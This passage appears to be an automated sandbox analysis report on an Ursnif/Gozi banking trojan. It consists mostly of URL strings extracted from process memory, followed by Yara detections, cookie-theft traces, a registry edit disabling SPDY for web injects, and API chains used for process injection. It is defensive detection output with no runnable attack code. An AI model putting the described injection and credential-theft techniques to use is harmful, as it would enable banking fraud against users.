            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.docUrl.com/bar.htm
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.expedia.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.gmarket.co.kr/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.co.in/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.co.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.co.uk/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com.br/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com.sa/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com.tw/
            Source: msapplication.xml1.3.dr | String found in binary or memory: http://www.google.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.cz/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.es/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.fr/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.it/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.pl/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.ru/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.si/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.iask.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.iask.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.kkbox.com.tw/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.linternaute.com/favicon.ico
            Source: msapplication.xml2.3.dr | String found in binary or memory: http://www.live.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.maktoob.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolibre.com.mx/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.merlin.com.pl/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.merlin.com.pl/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.mtv.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.mtv.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.myspace.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.najdi.si/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.najdi.si/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.nate.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.neckermann.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.neckermann.de/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.news.com.au/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.nifty.com/favicon.ico
            Source: msapplication.xml3.3.dr | String found in binary or memory: http://www.nytimes.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.orange.fr/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.otto.de/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.ozon.ru/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.ozon.ru/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.ozu.es/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.paginasamarillas.es/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.pchome.com.tw/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.priceminister.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.priceminister.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.rambler.ru/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.rambler.ru/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.recherche.aol.fr/
            Source: msapplication.xml4.3.dr | String found in binary or memory: http://www.reddit.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.rtl.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.rtl.de/favicon.ico
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.servicios.clarin.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.shopzilla.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.sify.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.sogou.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.sogou.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.soso.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.soso.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.t-online.de/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.taobao.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.taobao.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.target.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.target.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.tchibo.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.tchibo.de/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.tesco.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.tesco.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiscali.it/favicon.ico
            Source: msapplication.xml5.3.dr | String found in binary or memory: http://www.twitter.com/
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.univision.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.univision.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.walmart.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.walmart.com/favicon.ico
            Source: msapplication.xml6.3.dr | String found in binary or memory: http://www.wikipedia.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.ya.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www.yam.com/favicon.ico
            Source: msapplication.xml7.3.dr | String found in binary or memory: http://www.youtube.com/
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www3.fnac.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://www3.fnac.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://z.about.com/m/a08.ico
            Source: powershell.exe, 0000001A.00000002.652653486.000002A594731000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000001A.00000002.652653486.000002A594731000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000001A.00000002.652653486.000002A594731000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000001A.00000002.427712389.000002A5848DE000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 0000001A.00000002.652653486.000002A594731000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Yara detected Ursnif
            Source: Yara match | File source: 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.242195768.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.242321431.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.242337914.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000023.00000003.416323968.0000011AB4010000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.409185391.0000000000560000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.242277638.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.242347487.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.350560370.0000000002F8B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.242303966.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.242243405.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.242219094.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5556, type: MEMORY
            Source: Yara match | File source: Process Memory Space: control.exe PID: 4672, type: MEMORY
            Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6780, type: MEMORY

            E-Banking Fraud:

            Detected Gozi e-Banking trojan
            Source: C:\Windows\System32\loaddll32.exe | Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff | 0_2_004531EC
            Source: C:\Windows\System32\loaddll32.exe | Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie | 0_2_004531EC
            Source: C:\Windows\System32\loaddll32.exe | Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff | 0_2_004531EC
            Yara detected Ursnif
            Source: Yara match | File source: 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.242195768.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.242321431.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.242337914.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000023.00000003.416323968.0000011AB4010000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.409185391.0000000000560000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.242277638.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.242347487.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.350560370.0000000002F8B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.242303966.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.242243405.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.242219094.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5556, type: MEMORY
            Source: Yara match | File source: Process Memory Space: control.exe PID: 4672, type: MEMORY
            Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6780, type: MEMORY
            Disables SPDY (HTTP compression, likely to perform web injects)
            Source: C:\Windows\explorer.exe | Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

            System Summary:

            Writes or reads registry keys via WMI
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMI
            Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exe | Memory allocated: 73750000 page execute and read and write
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_73751CEF GetProcAddress,NtCreateSection,memset, | 0_2_73751CEF
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_737515AB GetLastError,NtClose, | 0_2_737515AB
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_73751880 NtMapViewOfSection, | 0_2_73751880
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_737524C5 NtQueryVirtualMemory, | 0_2_737524C5
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0044B868 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, | 0_2_0044B868
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00461813 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, | 0_2_00461813
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00446825 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, | 0_2_00446825
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00453A77 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, | 0_2_00453A77
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0045620F GetProcAddress,NtCreateSection,memset, | 0_2_0045620F
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0045A3DE NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, | 0_2_0045A3DE
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0046345F NtMapViewOfSection, | 0_2_0046345F
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00462557 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, | 0_2_00462557
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00441D18 HeapFree,memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset, | 0_2_00441D18
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0044C536 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, | 0_2_0044C536
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0045865A NtQueryInformationProcess, | 0_2_0045865A
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0044976D GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, | 0_2_0044976D
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00450084 memset,NtQueryInformationProcess, | 0_2_00450084
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00465A8E NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, | 0_2_00465A8E
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0045AAB7 NtGetContextThread,RtlNtStatusToDosError, | 0_2_0045AAB7
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00444C96 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, | 0_2_00444C96
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00457511 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, | 0_2_00457511
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00442D26 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, | 0_2_00442D26
